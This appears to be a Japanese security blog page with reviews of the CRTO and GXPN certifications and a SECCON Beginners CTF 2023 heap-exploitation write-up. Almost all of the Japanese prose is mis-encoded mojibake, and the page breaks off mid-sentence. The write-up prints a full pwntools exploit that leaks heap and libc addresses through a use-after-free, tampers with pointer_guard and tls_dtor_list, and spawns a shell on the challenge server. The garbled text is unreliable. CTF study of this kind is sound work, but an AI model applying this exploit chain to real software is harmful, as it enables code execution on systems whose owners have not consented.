CRTOãåãã¦ãã¾ãã
ãããã¬ã¼ã·ã§ã³ãã¹ãä¸è¬ã®ç¥èã»æè¡ã¨ãã¦Offsec社ã®OSCPãåå¼·ãã¦ãããã®ã®ãADãAV/EDRåé¿ã¨ãã£ããã¨ã«å¼±ç¹ãæããã®ã§ãCRTO試é¨ãåãã¦ãã¾ããã
èªç§°ããã³ãã«ãã¹ãã©ã¤ã«ã¼ã«ãªããããªã¨ããã
- RTOã«ã¤ãã¦
- åãããã¨æã£ããã£ãã
- åé¨ã®ããã¯ã°ã©ã¦ã³ã
- åè¬ãã試é¨ã¾ã§
- 試é¨ç°å¢ç
- åé¨å¾ã®ææ³
- OSCPã¨æ¯è¼ãã¦ã©ããªã®ãåé¡
- éæ
- æå¾ã«
RTOã«ã¤ãã¦
ã³ã¼ã¹å 容
Zeropoint Security社ãæä¾ãããRed Team Opsãã¯ãªã³ã©ã¤ã³ã®èªå·±å¦ç¿ã³ã¼ã¹ã§ãã¬ãããã¼ã ã«å¿ è¦ãªåºæ¬çç¥èã¨ãã¼ã«ãWindows DefenderãAMSIãApplockerã®åé¿ã«ã¤ãã¦ãå«ã¾ãã¦ãããbad OPSECï¼æ¤åºã«ç¹ããã¢ã¯ã·ã§ã³ï¼ãä½ããããæãã¦ããã¾ãã
ã«ãªãã¥ã©ã ãæ²è¼ããã¦ãã¦ãæ»æã®ã©ã¤ããµã¤ã¯ã«ã§ã¾ã¨ã¾ã£ã¦ããã®ã§æ¯è¼çç解ããããã§ãããã®ã³ã¼ã¹ã®æ大ã®ç¹å¾´ã¯ãããç¥ããããCobalt Strikeãã§Post-Exploitãè¡ãç¹ãã¨ã
training.zeropointsecurity.co.uk
ç°å¢é¢ã«ã¤ãã¦
ããã¹ã
Webãã¼ã¹ã®ããã¹ãã§PDFã®åºåãªã©ã¯ããã¾ããããç¾æç¹ã§ã¯ä¸åº¦è³¼å ¥ãã¦ãã¾ãã°é²è¦§æéã¯ããã¾ããã®ã§ããããåèæ¸ã¨ãã¦å®åã«çããã¦ããã¨ãã£ãã³ã¡ã³ããè¦åãããã¾ããããã£ã¨ä½¿ããã®ã¯ããªãã®ã¢ããã³ãã¼ã¸ããªã¨æãã¾ãã
ã©ãï¼Snap Labsï¼
ã©ãã¯å¥å£²ãã®ãµãã¹ã¯å½¢å¼ã«ãªã£ã¦ãã¦ãå·çæç¹ã§ã¯30æ¥ã180æ¥ã365æ¥ã®ããããããé¸ã¹ã¾ãããã®æéã§ç¡å¶éã¨ããããã§ã¯ãªããããããä¸éã®å©ç¨æéï¼120ã250ã500æéï¼ãè¨å®ããã¦ãã¾ããã©ããã·ã£ãããã¦ã³ãå¿ããã¨æéã溶ãã¦ããã¾ãã®ã§ã注æãï¼èªåã§æ¢ããæ©è½ãããããã§ããï¼ã
ã¾ããGuacamoleçµç±ãªã®ã§VPNã¯ä½¿ãã¾ããã
ããã¹ããã¼ã¹ã®ã³ããã¯å¯è½ã§ããããã¡ã¤ã«ã¯æã¡è¾¼ã¿ãæã¡åºãã¯ã§ãã¾ãããåºæ¬ã¯ä¸ããããç°å¢å
ã§ã®Living off the landçãªãã®ã¨èããã»ããããã§ãã
è²»ç¨ã«ã¤ãã¦
ï¼ãã³ãï¼180åãããã ã£ãã®ã§ãåè¨ã§ï¼ä¸åãããã ã£ããã¨æãã¾ãã
ã³ã¼ã¹ï¼RTO-1ï¼ï¼ï¿¡365
ã©ã180æ¥ï¼ï¿¡83
æ¯å¹´ã®æµãã§ããã°Black Fridayãã¤ã®ãªã¹ã®ç¥æ¥ãããã«ã¡ããã¡ããå®ããªã£ã¦ããã¿ãããªã®ã§ãã®ã¿ã¤ãã³ã°ãçãã®ãè¯ããã¨ã
åãããã¨æã£ããã£ãã
- ãµã¤ãã¼ã»ãã¥ãªãã£ã«ä¿ãè½åã®çãã¬
- OPSECãAV/EDRãå種ã»ã³ãµã¼åé¿ãé¡æã«ãããã¬ã¼ãã³ã°ã«èå³ãã
- åå®ãç ½ããåããå½±é¿ã§Offsecã®ãå¸æ½ãã§ããã»ã©ã®ä½è£ããªãã£ã
ãã³ããäºåä»äºã°ã£ãããã¦ããã¨ã¹ãã«ãéåããã®ã§ä¸å®ã§ãããããªããã§ããããã¨å·çæç¹ã§Offsecã¯ã»ã¼ã«ãã£ã¦ã¾ãããå¹´éã§300kã§ãããããSANSã«æ¯ã¹ãã°ãã·ã§ããã
åé¨ã®ããã¯ã°ã©ã¦ã³ã
åè¬ãã試é¨ã¾ã§
ã¹ã±ã¸ã¥ã¼ã«æ
ãã£ã¨1.5ãæç¨åº¦ã§åé¨ã¾ã§ããã¤ãã¾ãããæ¥å¸¸çæ´»ã«ããã¦ã»ãã®äºããããªãããè±èªå¦ç¿ã®ä¸ç°ã ã¨æã£ã¦ããã¹ããæä½æ¥ã§ç¿»è¨³ãã¦ããã®ã§ç¸å½æéããããã¾ããã
40ï½60æéããããé©åã¨ãã£ãããã°ãããã¾ããããã®ãã³ãã¨120æéããã使ã£ãã®ã§ã翻訳ãã¼ã«ãæ´»ç¨ããã°ããå°ãæéã¯ç縮ã§ããã¨æãã¾ãã
- è³æã®èªã¿è¾¼ã¿ï¼åç®ï¼ã©ãï¼ç´ï¼ãæ
- Defenderæå¹åï¼ã©ãï¼åç®ï¼ç´0.5ãæï¼
- C2ãããã¡ã¤ã«ã®å確èªï¼ï¼æ¥ç¨åº¦ï¼
ãªããã©ãã®å©ç¨æéæ¨ç§»ã¯ä»¥ä¸ã®ãããªæãã§ãããå¥ã®ãã¨ããããªããã復ç¿ãå ¼ãã¦ãããããã£ã¦ããã®ã§50æéç¨åº¦ã¯ç¡é§ã«æº¶ããã¦ããæãããã¾ãã
æåã®20æ¥ï¼50æé
30æ¥ã¾ã§ï¼76æé
40æ¥ã¾ã§ï¼113æé
試é¨ç´åï¼175æé
è©°ã¾ã£ãæã®ã³ãã¥ããã£é ¼ã¿
Offsecåæ§ãDiscordã¨student dashboardãããã¾ããè¿·ã£ããããåç §ãã¦ãã¾ããã
試é¨ç°å¢ç
試é¨ã®ä¸èº«ã«ã¤ãã¦ã¯çç¥ãã¾ããããã£ã¨ä»¥ä¸ã®ã¨ããã§ãã
- 模æ¬ç°å¢ã«ããã¦ä¸ãããããã©ã°ãåå¾ããCTFå½¢å¼
- ï¼æ¥éã¾ãã¯48æéï¼éä¸ã§ã©ããã·ã£ãããã¦ã³ãããã¨ãå¯è½ï¼
- 6/8åã®ãã©ã°ãåå¾ããã°åæ ¼ï¼75%ï¼
- Proctorã«ãã試é¨ç£ç£ãªã
Offsecã®ãããªç·å¼µæã¯ãªããå®å»ããå§ããããå
¨ä½ã¨ãã¦ãã£ããè¨ãã¾ãã
OSWPåé¨ã®æã¯ããã®é»ãç®±ã¯ä½ã ãçä»ãããããã¯ä½ã ï¼ãã¿ãããªããåãã§è©¦é¨æéã3æéã¡ããã®ãã¡ã®30åã溶ãã¾ããã»ã»ã»
åé¨å¾ã®ææ³
ã ããã20æéç¨åº¦ã§å
¨ã¦ã®ãã©ã°ã«å°éãã¾ããã
æåã¨éä¸ã§ããããªããã®ã§ãããæ¯ãè¿ã£ã¦åæããã¨ããã極度ã®ç·å¼µããæ¥ãå¡ãã¹ã§ãããä¸ããããç°å¢ãããã¹ãããã£ããã¨ç解ãã¦ããã°åé¡ã¯ãªããã¨æãã¾ããããã¹ãå
ã«ç¤ºããã¦ãããã£ã¬ã³ã¸èª²é¡ã¯ãã£ãããã£ãæ¹ãèªä¿¡ã«ã¤ãªããã¾ãã
ãã®æã®è³æ ¼è©¦é¨ã§æ¯åæãã¾ããããã®ããããªæéã¯ç²¾ç¥ãããæ¸ãããã¾ãããããä¸åããããåé¨ããã¨é常ã«æ鬱ã§ããã
試é¨æéãæ®ã10æé以ä¸ãã£ãã®ã§ãããåæ ¼åºæºãæºããã¦ããã®ã§Canvas Badgesããã¡ã¼ã«ãå±ãã¦ã¾ããã
OSCPã¨æ¯è¼ãã¦ã©ããªã®ãåé¡
ããããã¬ãããã¼ã ã¨ãããã¬ã¼ã·ã§ã³ãã¹ããåçã«æ¯è¼ãããã¨ã¯å°é£ãªã®ã§ãå ¬éãããã·ã©ãã¹ãè¸ã¾ãã¦ãã£ããã¨ãã主観ã§ãã
- OSCPã¯åºãæµ ããC2ãã»ã¼ä½¿ããªã
- CRTOã¯Post-Exploitéè¦ãC2ãµã¼ãå©ç¨ãã¡ã¤ã³
C2ãµã¼ããé§ä½¿ãã¦æ§ã ãªæä½ãè¡ãã¨ããç¹ã§ã¯ãåºæ¬çäºé ãç解ãã¦ããªãã¨C2ã®ãã¼ã«ãå¤ãã度ã«è¦å´ããããªç¹ããããããããç¹ã§ã¯OSCPã§C2ã使ããªãåºæ¬çäºé ãç解ãã¦ãããã¨ã大äºã¨æããOSCPâCRTOã®ã©ã¼ãã³ã°ãã¹ã¯ãããªãã«ããã£ããªã¨æãã¾ããã
ã¾ããåã ããæ»æè ã°ã«ã¼ããCobalt Strikeãå¤æ°å©ç¨ãã¦ãããã¨ãç´å¾ã§ãæ¬å½ã«ä¾¿å©ãªPost-Exploitãã¼ã«ã§ããã¨èªèãã¾ããï¼execute-assemblyã¯è¶ 便å©ï¼ã
ãã ãOSEPã¨ã®ã·ã©ãã¹æ¯è¼ã§ããä¾ãã°IDS/IPSã®åé¿ã¨ãã£ãç¹ãCRTOã«ã¯ãªããã©ããæè¯ã§ããã¨ããã®ã¯çµè«ãã¥ããã¨ããã§ããã
éæ
æãããã¨ã以ä¸ã«è¨è¼ãã¦ããã¾ãã
åç»ã«åå¹ããªã
è±èªãè¦æãªæ¹ã¯å°ã 大å¤ããããã¾ãããgoogle chromeã®ã¦ã¼ã¶è£å©ã使ã£ã¦ç¿»è¨³ï¼è±èªã«æåèµ·ããï¼ã¯ã§ããã®ã§ãæ´»ç¨ããå§ããã¾ãã
大äºãªã¨ããã«ãã©ã¼ã«ã¹ãã¦ããã®ã§ã説æããã£ãã
Offsecã®ãããªè¦ªåãªåç»èª¬æã¯ãªãã®ã§ã注æããããããªãé¨åã¯èªåã§èª¿ã¹ããã¨ãå¤å°å¿ è¦ã«ãªãããããã¾ããã
å ¨ã¦ã®é ç®ã«åç»ãããããã§ã¯ãªã
æ°ã«ãªãã¨ããã¯ã©ããæ´»ç¨ãã¦èªåã§ç解ãããã¾ãã¯ãã©ã¼ã©ã ãæ´»ç¨ãããã¨ã«ãªãã¾ãã
ã©ã®ã³ã³ããã¹ãã§å®è¡ããã¢ã¯ã·ã§ã³ããææ¡ãã
ä¾ã§Kerberosã§ãã±ãããè¦æ±ããéãã©ã®ã³ã³ããã¹ãã§å®è¡ãã¹ããªã®ããããããããªããªãã®ã§ã試é¨åã«æ´çãã¦ããã¨é ãã¹ãããªãã¾ãã
Guacamoleã¯ãã¼ãã¼ãã®ã¿ã¤ããã¹ãå¤æ°çºç
ã¡ã³ãã¬ã³ã¨ã¡ã«ãã«ã«ãã¼ãã¼ãã使ãåããç°å¢ã§ã¯ãã¡ã«ãã«ã«ãã¼ãã¼ãã®ã¿ãmimikatz lsadump::dcsynccccccccccccãã¨ãã£ãã¿ã¤ãé£æãèµ·ãã¾ãããæå
ã®ç°å¢ã®åé¡ããããã¾ãããåèã¾ã§ã
å²ã¨ã¹ãã¬ã¹ããã¾ã£ãã®ã§ããã©ã¦ã¶ä¸ã®ä»®æ³ãã·ã³ã«ç´æ¥å
¥åããã®ã§ã¯ãªãããã¹ãä¸ã®ã¡ã¢å¸³ãªã©ã使ã£ã¦ããã³ãããã¦ã¾ããã
Defenderãæå¹ã«ããå ´åã¨ããªãå ´åã§æ¦ç¥ã®çµã¿æ¹ãå ¨ãéã
ããã¯ãã®ãã¬ã¼ãã³ã°ã®æ大ã®å©ç¹ãã¨æãã¾ãããä¸éãã®æè¡ãç解ããã¦ããWild Lifeã§ã¯æ¬å½ã«éç¨ããã®ããã¨ãã£ãæãã§ããç¾å®ã®ä¸çãè¦æ®ããã«ãªãã¥ã©ã ã®çµã¿æ¹ã¯é常ã«ããã£ããªã¨æãã¾ããã
ãã®ãããDefenderãæå¹ã«ãã¦ããã©ããããä¸åº¦ããªããã¨ããå§ããã¾ãã
æå¾ã«
ã³ã³ãã³ãã¨ãã¦ã¯æ´æ°é »åº¦ãæ©ããã¨ã¦ãç´ æ´ããããã®ã§ãããã©ãç°å¢ã®ã¢ãããã¼ãã¹ãã¼ããéãããã«æãã¾ãã
ç§ã®å¼±ç¹ã®ADç¥èã大å¹
ã«è£å¼·ãã¦ããã¾ããã次ã¯RTO-2ã«è¡ãããOSEPã«è¡ããã¯ã¡ãã£ã¨èãããã¨æãã¾ããOSEDãåããããã©Offsecã¸ã®ãå¸æ½ã足ããªãã
SECCON Beginners CTF 2023 writeup(No_Control)
pwnã®Hardåããããã解ããããã«ãªã£ã¦ããã®ã§ãåå¼·ãã¦ãWriteupãæ¸ãã¾ãã
å¤å°ä¸æããããããã¾ãããã容赦ãã ããã
ãã¡ã¤ã«ã®ç¶æ
ã»ãã¥ãªãã£ãå ¨ã¦æå¹ãPIEã64bitãã½ã¼ã¹ãããlibc2.35ã
$ file chall chall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=faa7e2ee4798355d90527ada0307ea81a8270657, not stripped $ checksec --file=chall --output=csv Full RELRO,Canary found,NX enabled,PIE enabled,No RPATH,RUNPATH, Symbols,No,0,3,chall
CRUDã¨ããã¨ãããå ¸åçãªheapåã®ãªãã·ã§ã³ã
$ ./chall 1. create 2. read 3. update 4. delete 5. exit >
èå¼±æ§ç
Write-after-free
update_memo()ã¯ã¡ã¢ã®ä¸èº«ã空ã§ãmemoã®ãã¤ã³ã¿ãåå¨ããã°è§£æ¾ããããã£ã³ã¯ã«ãã¼ã¿ãæ¸ãè¾¼ããã
âtcacheã®FD/BKãæ¹ããå¯è½ã
void update_memo() { int idx; char *memo; idx = ask_index(); if (idx < 0 || LIST_SIZE <= idx) { puts("Invalid index"); } else if (memos[idx] == NULL) { puts("that memo is empty"); } else { memo = memos[idx]; } if (memo == NULL) { puts("something wrong"); } else { printf("content: "); read(STDIN_FILENO, memo, MEMO_SIZE); } return; }
Read-after-Free
create_memo()ãdelete_memo()ãå®è¡ãã¦tcacheã«å
¥ããå度create_memo()ãè¡ãã¨ã解æ¾ããtcacheãåå©ç¨ãããread_memo()ã§tcacheã®FDãèªã¿åãå¯è½ã«ãªãã
tcacheã«ã¦ã³ãã®æ¸ãæã
ããã§ã®æ³¨æç¹ã¨ãã¦Tcacheã®FDãGLIBC2.32ããPROTECT_PTRãã¯ãã«ãã£ã¦ä¿è·ãããããã«ãªã£ã¦ããã
ã¾ãã次ã®tcacheã¢ãã¬ã¹ã®ã¢ã©ã¤ã¡ã³ãã16ãã¤ãã«æ²¿ã£ã¦ããªãã¨æãããã
https://sourcegraph.com/github.com/bminor/[email protected]/-/blob/malloc/malloc.c
#define PROTECT_PTR(pos, ptr) \ ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
次ã®tcacheã®ãã¤ã³ã¿ããªããã°ï¼ããªãã¡NULLï¼ãåã«12bitå·¦ã«ã·ããããã¨heapã®ãã¼ã¹ã¢ãã¬ã¹ãå¾ããã¨ãã§ããã
ãã ãããã§ã¯libcã®ã¢ãã¬ã¹ã¯åºã¦ããªãã®ã§ãtcacheã®ã¡ã¿ãã¼ã¿ï¼ã«ã¦ã³ãæ°ï¼ï¼ä»¥ä¸ã«æ¹ãããã¦ã次ã«è§£æ¾ãããã£ã³ã¯ãunsortedbinã«éãããããã«ããå¿
è¦ãããã
ããããã¨ã«åè¿°ã®Write-After-Freeã使ã£ã¦tcacheã®æ¬¡ã®ã¨ã³ããªãtcacheã®ã¡ã¿ãã¼ã¿ã®ã«ã¦ã³ãæ°é¨åï¼heapãã¼ã¹+0x10ï¼ããã¤ã³ãããããã«ãã0x90ã®ãµã¤ãºãï¼ã«æ¸ãæããã
tcacheã®ã«ã¦ã³ããã¨ã³ããªãããããããªãã¨ããæ¹ã¯ä¸è¨ã®è¨äºãåèã«ãªãã¾ãã
note.com
unsortedbinããã®libcãªã¼ã¯
0x90ã®tcacheã®ã«ã¦ã³ãæ°ãï¼ã«ãªã£ãã¨ããã§ãæ´ã«ãã£ã³ã¯ãéæ¾ããã°unsortedbinã«å
¥ãããæ®éã«å度mallocã§ç¢ºä¿ããã¨FD/BKãæ¶ãã¦ãã¾ã£ãã®ã§ãremainderingï¼ããã§ã¯é£æ¥ããunsortedbinãã£ã³ã¯ãï¼ã¤ä½ã£ã¦çµåããããããã0x90ãµã¤ãºãè¦æ±ãã¦åãåºãï¼ããããã¨ã§libcã®ãã¼ã¹ã¢ãã¬ã¹ãå¾ããã¨ãã§ããã
ãã®ä½æ¥ãããåã«tcacheã®ã«ã¦ã³ãæ°ãåã³ï¼ã«æ»ããunsortedbinã使ãããããã«ããå¿
è¦ããã
tls_dtor_listã®æ¹ãã
ããã¾ã§ããã°ããããã®ãã¼ã¹ã¢ãã¬ã¹ãããããä»»æã®ã¢ãã¬ã¹ã«ä»»æã®ãã¼ã¿ãæ¸ãè¾¼ããã¨ãå¯è½ã«ãªã£ãã®ã§ãexit_funcsã®tls_dtor_listãæ¹ãããã¦system(/bin/sh)ããã£ã¦ã¿ãã
ä¸è¨ãã¨ã¦ãåèã«ãªãã¾ããã
tttang.com
hjmsan.hatenablog.com
exitã®å¾ã«ä»»æã®é¢æ°ãå®è¡ãããããã«ã¯ãtls_dtor_listã«ç»é²ãããã¨ã«ãªãã
ãã®ä¸ã§PTR_MANGLE(func)ãã¯ãã«ããä¿è·ããã¦ãããããpointer_guardã®å¤ã¨ã®XORãRORã§å¾©å
ãããã¨ãå¿
è¦ã«ãªãã
https://sourcegraph.com/github.com/bminor/[email protected]/-/blob/stdlib/cxa_thread_atexit_impl.c
__call_tls_dtors (void) { while (tls_dtor_list) { struct dtor_list *cur = tls_dtor_list; dtor_func func = cur->func; PTR_DEMANGLE (func); tls_dtor_list = tls_dtor_list->next; func (cur->obj); /* Ensure that the MAP dereference happens before l_tls_dtor_count decrement. That way, we protect this access from a potential DSO unload in _dl_close_worker, which happens when l_tls_dtor_count is 0. See CONCURRENCY NOTES for more detail. */ atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1); free (cur); } }
# define PTR_DEMANGLE(var) asm ("ror $2*" LP_SIZE "+1, %0\n" \ "xor %%fs:%c2, %0" \ : "=r" (var) \ : "0" (var), \ "i" (offsetof (tcbhead_t, \ pointer_guard)))
ãã®pointer_guardã®å¤ã¯tcbhead_tã®æ§é ä½ã®0x30ãã¤ãç®ã«åå¨ããã
tcbhead_tã¯FSã»ã°ã¡ã³ãã«ä¿åããã¦ããã
https://sourcegraph.com/github.com/bminor/[email protected]/-/blob/sysdeps/x86_64/nptl/tls.h
typedef struct { void *tcb; /* Pointer to the TCB. Not necessarily the thread descriptor used by libpthread. */ dtv_t *dtv; void *self; /* Pointer to the thread descriptor. */ int multiple_threads; int gscope_flag; uintptr_t sysinfo; uintptr_t stack_guard; uintptr_t pointer_guard; unsigned long int unused_vgetcpu_cache[2]; /* snip..... */ } tcbhead_t;
tls_dtor_listæ¹ããã¾ã§ã®ã¢ããã¼ã
ã»pointer_guardã®å¤ã§ããFS:0x30ãä»»æã®å¤ã«ããï¼ããã§ã¯ï¼ã«ããï¼ã
ã»ä»»æã®é¢æ°ï¼systemï¼ãå®è¡ãããã®ã«å¿
è¦ãªè¨ç®ï¼RORãXORï¼ãè¡ã
addr = ((system ^ 0)<<0x11)&0xffffffffffff8000 addr += ((system ^ 0)>>0x2f)&0x7fff
ã»tls_dtor_listã«ãã¼ãã®ã¢ãã¬ã¹ãæ¸ãè¾¼ãï¼ãã¼ãã¢ãã¬ã¹ãä¸è¨ã®ããã«ãã
0x0 -> ç®åºããaddr 0x8 -> 0x10ã¸ã®ãã¤ã³ã¿ 0x10 -> /bin/sh\x00
ãã®ããã«ããã¨ãããã°ã©ã ãexitã§çµäºããã°__call_tls_dtorsã®call raxã§system(/bin/sh)ãéã£ã¦ãã¾ãããã§ãããã§ããã
ctf4b{w1sh_y0u_w3r3_h3r3}
æçµã¹ã¯ãªãã
from pwn import * elf = context.binary = ELF("./chall") libc = ELF("./libc.so.6") gs = ''' set breakpoint pending on break __call_tls_dtors continue ''' def start(): if args.GDB: return gdb.debug(elf.path, gdbscript=gs) else: return process(elf.path) #io = start() io = remote('no-control.beginners.seccon.games',9005) def create(index): io.sendlineafter(b"> ",b"1") io.sendlineafter(b"index: ",str(index).encode()) def read(index): io.sendlineafter(b"> ",b"2") io.sendlineafter(b"index: ",str(index).encode()) def update(index,content): io.sendlineafter(b"> ",b"3") io.sendlineafter(b"index: ",str(index).encode()) io.sendlineafter(b"content: ",content) def delete(index): io.sendlineafter(b"> ",b"4") io.sendlineafter(b"index: ",str(index).encode()) def exit_prog(): io.sendlineafter(b"> ",b"5") create(0) delete(0) create(1) read(1) heap_base = u64(io.recv(5).ljust(8,b"\x00"))<<12 chunk_addr = heap_base+0x2a0 info(f"heap_base @ 0x{heap_base:02x}") create(4) create(2) create(3) create(0) delete(3) delete(2) delete(0) update(0,p64((chunk_addr>>12)^heap_base+0x10)) # to allocate tcache count create(3) create(2) # tcache entry update(2,p64(0) + p64(0x0007000000000000)) delete(3) delete(1) # create unsortedbin delete(4) update(2,p64(0) + p64(0x0)) # drop tcache count create(1) read(1) unsorted_leak = u64(io.recv(6).ljust(8,b"\x00")) libc.address = unsorted_leak - 0x219df0 info(f"libc_base @ 0x{libc.address:02x}") ptr_guard = libc.address - 0x2890 dtor_list = libc.address - 0x2918-0x8 #tcache alignment gadget = libc.sym.system create(3) delete(3) delete(1) update(1,p64((chunk_addr>>12)^ptr_guard)) create(3) create(1) update(1,p64(0)) # set NULL to pointer_guard # ptr_demangle(ror,xor) addr = ((gadget^pointer_guard)<<0x11)&0xffffffffffff8000 addr += ((gadget^pointer_guard)>>0x2f)&0x7ffff create(4) delete(4) delete(3) update(3,p64((chunk_addr>>12)^dtor_list)) create(4) create(3) update(3,p64(0)+p64(chunk_addr)) #register heap_addr to dtor_list payload = p64(addr) payload += p64(chunk_addr+0x10) payload += b"/bin/sh\x00" update(4,payload) exit_prog() io.interactive()
free_hookãªããªãã¨ã»ãã¨ããã©ãããæããã»ã»ã»
GXPNãåãã¦ãã¾ãã
SANSã®è³æ ¼ã§ããGXPNã¯è±èªã®è¨äºã«ããã¦ããç¨åº¦å å®ãã¦ããã®ã§ãããæ¥æ¬èªã§ã¯ããã¾ã§åãæ±ããã¦ããªããããªã®ã§å ±æãã¦ããã¾ããåèã«ãªãã°å¹¸ãã§ãã
- è¬ç¾©ã¨è©¦é¨ã®ã¢ã¦ãã©ã¤ã³
- åé¨ã«ãããç§ã®ããã¯ã°ã©ã¦ã³ã
- ãã¬ã¼ãã³ã°åè¬æ
- 試é¨æºåæéã«ãã£ããã¨
- 試é¨å½æ¥
- GXPNåå¾å¾ã®æ¯ãè¿ã
- SANSã®è©¦é¨ãï¼ååãã¦æã£ããã¨ï¼GIACå ¨è¬ï¼
- ããããSEC660ãåè¬ãããï¼æ¤è¨ãã¦ããï¼æ¹ã¸
- GXPNã®å 人ã®ä½é¨è¨
- çµããã«
è¬ç¾©ã¨è©¦é¨ã®ã¢ã¦ãã©ã¤ã³
SANS社の日本語サイトã«ããã¨ããã§ãããSEC660ã¯ãExploit Researcher and Advanced Penetration Testerããã¢ããªã±ã¼ã·ã§ã³çã«å¯¾ããã¨ã¯ã¹ããã¤ãã³ã¼ãã®éçºãåå¿è ã®ãã³ãã¹ã¿ã¼ãèå¼±æ§ãè¦ã¤ããããªããããªç´°é¨é åï¼MITMãæå·ãKioskããã®è±åºãScapyã«ããç´°å·¥ãããã±ããã®ä½æãªã©ï¼ã¸ã®ãããã¬ã¼ã·ã§ã³ãã¹ãã«ã¤ãã¦ã®è¬ç¾©ãåãããã¾ãã
試é¨ã®æ¦è¦ã«ã¤ãã¦ã¯こちらã«è¨è¼ããã¦ãã¾ããããã£ã¨ãããªæãã§ãã
- 60åã®é¸æå¼ï¼ãã¡ãï¼åã®ãã³ãºãªã³ï¼
- 試é¨æéï¼180å
- 67%以ä¸ã§åæ ¼
åé¨ã«ãããç§ã®ããã¯ã°ã©ã¦ã³ã
- æ¬æ¥ã¯éç¨ãããªãããã¼ã¸ã£ã¼è·ãåéãè¦ã¤ãã¦è¶£å³ã§æãåããï¼ã³ãã³ããæã¤ï¼ã¬ãã«
- OSCP/CISSP/CISA/GPEN/KLCP/OSWP
- è±èªã¯å¥½ãã ãå¾æã§ã¯ãªããæµ·å¤ã®æ å ±ãgoogle翻訳ã¨å¯¾æ¯ãããªãããã£ããèªãç¨åº¦
- SOC/CSIRTæ¥åãæ°å¹´ç¨åº¦çµé¨ãã¦ãã
- 趣å³ã§CTFï¼æè¿ã¯offsecåé¨ç¥ãã§ãµãã£ã¦ããï¼
- ã¯ã©ã¦ãã¾ããã®çµé¨å¤ã¯ä½ã
- 診æï¼ãã³ãã¹ãï¼ã®ãä»äºçµé¨ã¯å®è³ªï¼å¹´ç®
ãã¬ã¼ãã³ã°åè¬æ
æ¯æ¥ãé常ã«èå³æ·±ãã³ã³ãã³ãã§ããããå
çã®èª¬æãèãã¦ãã¼ããã£ã³ãï¼è¬ç¾©å¾ã®èªä¸»ãã¬ï¼ãããã ãã§ç²¾ä¸æ¯ã§ãããSANSã®æè²ã³ã³ã»ãããã®ãã®ããã²ã¨ã¾ãããããæãã¦èªå·±å¦ç¿ãå¾ã§ãã¦ããããã¨ããã¹ã¿ã³ã¹ãªã®ã§ãæéä¸ã«å
¨ã¦ç解ããå¿
è¦ã¯ãªãã§ããè¬ç¾©ãCTFã®éã¯ã²ããã楽ãããã¨ãéè¦ã ã¨æãã¾ãããªããSEC660ã§ã¯2æ¥ç®ã«ããã¼ããã£ã³ãã§CTFããããæçµæ¥ãå«ã楽ããã£ãã§ãã
ã¾ããåè¬æéä¸ã«Windowsã®DEPç¡å¹ROPãã§ã¼ã³ãä½ããã¨ã¯ã§ããªãã£ãã®ã§ãããããã¹ãã詳細ã«è§£èª¬ããã¦ããã¦ããã®ã§ãããããã£ããèªããã¨ã§å¾æ¥ãªãªã¸ãã«ã®ROPãã§ã¼ã³ãä½ããã¨ãã§ãã¾ããã
試é¨æºåæéã«ãã£ããã¨
ãã¬ã¼ãã³ã°çµäºå¾ããç´ï¼ãµæéã§åé¨ã¾ã§ãã©ãçããã¨ãã§ãã¾ããããå¦ç¿æéã¯å¹³åãã¦æ¯æ¥ï¼ï½ï¼æéã¨ãã£ãã¨ããã§ãï¼è±èªã®å¾æãä¸å¾æã§æéã¯å¢æ¸ããã¨æãã¾ãï¼ã
- ç´50æ¥ï¼ããã¹ãã®éèªåã³Exerciseã®å¾©ç¿ãã¤ã³ããã¯ã¹ã®ä½æãçµäºå¾ã«ï¼åç®ã®æ¨¡æ¬è©¦é¨(85%)
- ç´5æ¥ï¼ããã¹ãã®æãèªã¿ãçµäºå¾ã«ï¼åç®ã®æ¨¡æ¬è©¦é¨(åãã85%)
- ç´5æ¥ï¼è¬ç¾©ã®ãããªè¦è´
試é¨å½æ¥
試é¨å 容ã¯ç§å¯ä¿æã®è¦³ç¹ãããä¼ãã§ããªãã®ã§ãå½æã®ç«ã¡æ¯ãèããè¨è¿°ãã¦ããã¾ãããã¢ã½ã³ã®ä¼å ´ã§åé¨ããGIACã®è©¦é¨ã¯ãªã¼ãã³ããã¯ï¼ããã¹ãçæè¾¼å¯ã模æ¬è©¦é¨ãããªã³ããã¦æã¡è¾¼ãã®ã¯NGï¼ãªã®ã§ã以ä¸ãæã¡è¾¼ã¿ã¾ããã
- è¬ç¾©ããã¹ã
- è±åè¾å ¸ï¼ã³ã³ãã¯ããªãã®ï¼
- ä½æããã¤ã³ããã¯ã¹
- ã³ãã³ããã¼ãã·ã¼ã
ã¨ã«ããã«ãã³ãéãã£ãã»ã»ã»
æéé åãªã©
å½åã®è¨ç»ã¨ãã¦54åãï¼æéããã³ãºãªã³ãï¼æéã¨ãã¾ãããå®éã¯ãã³ãºãªã³ä»¥å¤ã®54åãï¼æéã§è§£çãã¦ããä¼æ©ãåãããã®å¾ãã³ãºãªã³ã§30åã»ã©æéãä½ãã¦çµäºãã¾ãããæå¾ã®åé¡ã解çããã¨ãPassed(88%)ã¨ãã£ãæåãåºã¦ã»ã£ã¨ãã¾ããã
試é¨ç°å¢
試é¨ä¼å ´æ¬¡ç¬¬ã§ã¯ããã¨æãã®ã§ãããSANSã ãã®è©¦é¨ä¼å ´ã§ã¯ãªãã®ã§ãä¸ããããæºãçãå¯è½æ§ãããã¾ãï¼SANS試é¨ã§ï¼åã¨ãçãã£ãï¼ããã³ãºãªã³ã«ãã©ãçãã¾ã§ã¯ãæ¬ãåºããããã«ãã¼ãã¼ããå¥ã®å ´æã«åãããªã©ãã¦ã¹ãã¼ã¹ã確ä¿ãã¦ãã¾ããã
試é¨ãæ¯ãè¿ã£ã¦
GPENã®æã¨æ¯è¼ããã¨ãï¼åã«å¯¾ãã¦èãããã¨ãå¤ãã£ããªã¨ããæ触ã§ãï¼å½æãGPENã¯75åï¼7åã®ãã³ãºãªã³ã§ï¼æéã75%åæ ¼ï¼ã
GXPNåå¾å¾ã®æ¯ãè¿ã
SEC560ããæ¯è¼ãã¦ã¿ãã¨ãAdvancedãªå
